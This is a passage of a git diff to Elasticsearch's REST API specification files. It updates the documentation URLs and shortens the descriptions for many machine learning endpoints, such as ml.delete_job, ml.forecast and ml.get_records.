"description":"Clear the cached results from a trained model deployment" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-clear-trained-model-deployment-cache", + "description":"Clear trained model deployment cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json index 4361439579da8..4782dd01867f9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json @@ -1,8 +1,8 @@ { "ml.close_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html", - "description":"Closes one or more anomaly detection jobs. A job can be opened and closed multiple times throughout its lifecycle." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-close-job", + "description":"Close anomaly detection jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json index b224c870ed426..2d9937b622b02 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json @@ -1,8 +1,8 @@ { "ml.delete_calendar":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar.html", - "description":"Deletes a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar", + "description":"Delete a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json index 92fe4ea3486b9..3a00fd1d1f840 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json @@ -1,8 +1,8 @@ { "ml.delete_calendar_event":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar-event.html", - "description":"Deletes scheduled events from a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-event", + "description":"Delete events from a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json index e122c41f20858..ef25e742e0c5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json @@ -1,8 +1,8 @@ { "ml.delete_calendar_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar-job.html", - "description":"Deletes anomaly detection jobs from a calendar." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-job", + "description":"Delete anomaly jobs from a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json index 353f9a09023bc..cd7c65cd5617c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.delete_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-dfanalytics.html", - "description":"Deletes an existing data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-data-frame-analytics", + "description":"Delete a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json index 8cff1cbf83e58..f3aaf05a371dc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json @@ -1,8 +1,8 @@ { "ml.delete_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html", - "description":"Deletes an existing datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-datafeed", + "description":"Delete a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json index f2e8446934c1a..94045a1d9dd95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json @@ -1,8 +1,8 @@ { "ml.delete_expired_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-expired-data.html", - "description":"Deletes expired and unused machine learning data." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data", + "description":"Delete expired ML data" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json index e275a9dc9ede8..7565e9c0e98fc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json @@ -1,8 +1,8 @@ { "ml.delete_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-filter.html", - "description":"Deletes a filter." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-filter", + "description":"Delete a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json index 45235187b3550..b42f312d4cc1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json @@ -1,8 +1,8 @@ { "ml.delete_forecast":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-forecast.html", - "description":"Deletes forecasts from a machine learning job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-forecast", + "description":"Delete forecasts from a job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json index 696c0082d11f8..34d2bcd7732bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json @@ -1,8 +1,8 @@ { "ml.delete_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html", - "description":"Deletes an existing anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-job", + "description":"Delete an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json index 499cb3b19bbbd..da2958e59efec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.delete_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html", - "description":"Deletes an existing model snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-model-snapshot", + "description":"Delete a model snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json index 5d63138c320ed..1f13c27527815 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json @@ -1,8 +1,8 @@ { "ml.delete_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-trained-models.html", - "description":"Deletes an existing trained inference model that is currently not referenced by an ingest pipeline." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model", + "description":"Delete an unreferenced trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json index 8c2142260fbed..14c31c6c087ae 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json @@ -1,8 +1,8 @@ { "ml.delete_trained_model_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-trained-models-aliases.html", - "description":"Deletes a model alias that refers to the trained model" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model-alias", + "description":"Delete a trained model alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json index 75bff3b52d99a..e94a12f861e03 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json @@ -1,8 +1,8 @@ { "ml.estimate_model_memory":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-apis.html", - "description":"Estimates the model memory" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-estimate-model-memory", + "description":"Estimate job model memory usage" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json index d2c39612b866c..073fe8028091c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json @@ -1,8 +1,8 @@ { "ml.evaluate_data_frame":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/evaluate-dfanalytics.html", - "description":"Evaluates the data frame analytics for an annotated index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-evaluate-data-frame", + "description":"Evaluate data frame analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json index 3fd82e3603d08..f87653eea45eb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.explain_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/explain-dfanalytics.html", - "description":"Explains a data frame analytics config." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-explain-data-frame-analytics", + "description":"Explain data frame analytics config" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json index 71abaf9528183..92ee21828e02d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json @@ -1,8 +1,8 @@ { "ml.flush_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html", - "description":"Forces any buffered data to be processed by the job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-flush-job", + "description":"Force buffered data to be processed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json index a468741815b12..546444d05ee74 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json @@ -1,8 +1,8 @@ { "ml.forecast":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-forecast.html", - "description":"Predicts the future behavior of a time series by using its historical behavior." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-forecast", + "description":"Predict future behavior of a time series" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json index dcf9a2cbe3067..15939f86aa69e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json @@ -1,8 +1,8 @@ { "ml.get_buckets":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html", - "description":"Retrieves anomaly detection job results for one or more buckets." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-buckets", + "description":"Get anomaly detection job results for buckets" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json index 0b3435ff3f935..81ef3c27d0814 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json @@ -1,8 +1,8 @@ { "ml.get_calendar_events":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-calendar-event.html", - "description":"Retrieves information about the scheduled events in calendars." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendar-events", + "description":"Get info about events in calendars" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json index d7666f69d1da9..6c21b9ba7aa46 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json @@ -1,8 +1,8 @@ { "ml.get_calendars":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-calendar.html", - "description":"Retrieves configuration information for calendars." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendars", + "description":"Get calendar configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json index 69f8dd74e3d55..e78abfe87b8e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json @@ -1,8 +1,8 @@ { "ml.get_categories":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html", - "description":"Retrieves anomaly detection job results for one or more categories." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-categories", + "description":"Get anomaly detection job results for categories" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json index aa1b3e5dea7a5..1afc924a5a919 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.get_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-dfanalytics.html", - "description":"Retrieves configuration information for data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analytics", + "description":"Get data frame analytics job configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json index f62d36d1c5bd6..ccdf1eb57e68b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json @@ -1,8 +1,8 @@ { "ml.get_data_frame_analytics_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-dfanalytics-stats.html", - "description":"Retrieves usage information for data frame analytics jobs." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analytics-stats", + "description":"Get data frame analytics job stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json index a7d3693bc2274..cf79250fbbe0b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json @@ -1,8 +1,8 @@ { "ml.get_datafeed_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html", - "description":"Retrieves usage information for datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeed-stats", + "description":"Get datafeed stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json index 8eb6624213bd9..8790a792ad86d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json @@ -1,8 +1,8 @@ { "ml.get_datafeeds":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html", - "description":"Retrieves configuration information for datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeeds", + "description":"Get datafeeds configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json index 1f195a4260c44..aeaf0a0135e30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json @@ -1,8 +1,8 @@ { "ml.get_filters":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-filter.html", - "description":"Retrieves filters." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters", + "description":"Get filters" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json index bf4e43d4b0302..88d901b7f9edd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json @@ -1,8 +1,8 @@ { "ml.get_influencers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html", - "description":"Retrieves anomaly detection job results for one or more influencers." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-influencers", + "description":"Get anomaly detection job results for influencers" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json index d19b858d8fd51..e270ea207b032 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json @@ -1,8 +1,8 @@ { "ml.get_job_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html", - "description":"Retrieves usage information for anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats", + "description":"Get anomaly detection job stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json index 3de361872d180..97267ec66c6ab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json @@ -1,8 +1,8 @@ { "ml.get_jobs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html", - "description":"Retrieves configuration information for anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs", + "description":"Get anomaly detection jobs configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json index 272f2264292d3..341aa4fe5bf4b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json @@ -1,8 +1,8 @@ { "ml.get_memory_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-ml-memory.html", - "description":"Returns information on how ML is using memory." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-memory-stats", + "description":"Get machine learning memory usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json index f20b770501133..fe054c827b857 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json @@ -1,8 +1,8 @@ { "ml.get_model_snapshot_upgrade_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-model-snapshot-upgrade-stats.html", - "description":"Gets stats for anomaly detection job model snapshot upgrades that are in progress." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshot-upgrade-stats", + "description":"Get anomaly detection job model snapshot upgrade usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json index 1a9c91478b325..d03aa02949d58 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json @@ -1,8 +1,8 @@ { "ml.get_model_snapshots":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html", - "description":"Retrieves information about model snapshots." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshots", + "description":"Get model snapshots info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json index a8e97ac87b1ef..1bf5bccc199e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json @@ -1,8 +1,8 @@ { "ml.get_overall_buckets":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-overall-buckets.html", - "description":"Retrieves overall bucket results that summarize the bucket results of multiple anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-overall-buckets", + "description":"Get overall bucket results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json index 9af20f7019929..25cc0984c3ca6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json @@ -1,8 +1,8 @@ { "ml.get_records":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html", - "description":"Retrieves anomaly records for an anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-records", + "description":"Get anomaly records for an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json index e5b635b02075c..69960e00e2110 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json @@ -1,8 +1,8 @@ { "ml.get_trained_models":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-trained-models.html", - "description":"Retrieves configuration information for a trained inference model." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models", + "description":"Get trained model configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json index c04b265b36c83..ad1a8fecdc3f7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json @@ -1,8 +1,8 @@ { "ml.get_trained_models_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-trained-models-stats.html", - "description":"Retrieves usage information for trained inference models." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models-stats", + "description":"Get trained models usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json index 95d389266302c..a3dba67c2425f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json @@ -1,8 +1,8 @@ { "ml.infer_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/infer-trained-model.html", - "description":"Evaluate a trained model." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-infer-trained-model", + "description":"Evaluate a trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json index 25659abf3f662..8ed321939c20a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json @@ -1,8 +1,8 @@ { "ml.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-ml-info.html", - "description":"Returns defaults and limits used by machine learning." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info", + "description":"Get machine learning information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json index b93b9cff82568..a4ecabe13ec9b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json @@ -1,8 +1,8 @@ { "ml.open_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html", - "description":"Opens one or more anomaly detection jobs." 
